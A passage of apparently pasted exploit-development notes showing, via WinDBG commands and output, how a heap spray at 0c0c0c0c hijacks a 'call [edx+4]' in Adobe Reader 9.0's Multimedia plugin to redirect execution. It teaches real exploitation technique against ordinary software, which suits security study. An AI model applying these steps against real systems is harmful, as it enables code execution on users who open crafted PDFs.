  2516. We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
  2517.  
  2518. We want to see what led to the crash.
  2519.  
  2520. EIP is invalid, so we can't disassemble around EIP
  2521.  
  2522. We need to trace the function that called us and crashed.
  2523. - STACK TRACE
  2524. - Dumps all the frames from the top of the stack.
  2525. - show you the series of calls that led up to the crash.
  2526. - we will analyze the topmost function on the frame.
  2527.  
  2528. WinDBG - stack trace - "k" command
  2529.  
  2530. 0:000> k
  2531. ChildEBP RetAddr
  2532. WARNING: Frame IP not in any known module. Following frames may be wrong.
  2533. 0013fb34 2d843117 0x90909090
  2534. 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
  2535. 0013fbdc 23825d8c EScript!PlugInMain+0x25584
  2536. 0013fc74 238257e2 EScript!PlugInMain+0x249dc
  2537. 0013fca4 238543c5 EScript!PlugInMain+0x24432
  2538. 0013fd04 00a78de1 EScript!PlugInMain+0x53015
  2539. 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
  2540. 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
  2541. 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
  2542. 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
  2543. 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
  2544. 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
  2545. 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
  2546. 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
  2547. 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
  2548. 0013ffc0 7c817067 AcroRd32+0x4004
  2549. 0013fff0 00000000 kernel32!BaseProcessStart+0x23
  2550.  
  2551. 2d843117 -- the return address that we would have returned to, if we didnt crash.
  2552. address 2d843117-2 we will have a CALL instruction.
  2553.  
  2554. u 2d843117
  2555. u 2d843117-2
  2556. u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
  2557. u 2d843117-4
  2558.  
  2559. 0:000> u 2d843117-3
  2560. Multimedia!PlugInMain+0x41b66:
  2561. 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
  2562. 2d843117 6a00 push 0
  2563. 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
  2564. 2d84311e 56 push esi
  2565. 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
  2566. 2d843124 83c40c add esp,0Ch
  2567. 2d843127 66b80100 mov ax,1
  2568. 2d84312b 5e pop esi
  2569.  
  2570. We control EDX
  2571. edx=0c0c0c0c
  2572.  
  2573. call [edx+4] = call [0c0c0c10]
  2574. dd edx+4
  2575.  
  2576. 0:000> dd edx+4
  2577. 0c0c0c10 90909090 90909090 90909090 90909090
  2578. 0c0c0c20 90909090 90909090 90909090 90909090
  2579.  
  2580. 0:000> u 2d843117-7
  2581. Multimedia!PlugInMain+0x41b62:
  2582. 2d843110 8b10 mov edx,dword ptr [eax]
  2583. 2d843112 8bc8 mov ecx,eax
  2584. 2d843114 ff5204 call dword ptr [edx+4]
  2585.  
  2586. dd eax
  2587.  
  2588. 0:000> dd eax
  2589. 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
  2590. 02e2d690 42424242 42424242 42424242 42424242
  2591. 02e2d6a0 42424242 42424242 42424242 42424242
  2592. 02e2d6b0 42424242 42424242 42424242 42424242
  2593. 02e2d6c0 42424242 42424242 00000000 00000000
  2594.  
  2595. mnp3.pdf
  2596.  
  2597. change the NOPs 90909090 to 0c0c0c0c
  2598.  
  2599. mov edx, [eax]
  2600. call [edx+4]
  2601.  
  2602. edx = 0c0c0c0c
  2603. edx+4 = 0c0c0c10
  2604. contents at edx+4 will also be "0c0c0c0c"
  2605.  
  2606. EIP will jump to 0c0c0c0c
  2607.  
  2608. and...
  2609.  
  2610. 0:000> u 0c0c0c0c
  2611. *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
  2612. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
  2613. 0c0c0c0c 0c0c or al,0Ch
  2614. 0c0c0c0e 0c0c or al,0Ch
  2615. 0c0c0c10 0c0c or al,0Ch
  2616. 0c0c0c12 0c0c or al,0Ch
  2617. 0c0c0c14 0c0c or al,0Ch
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement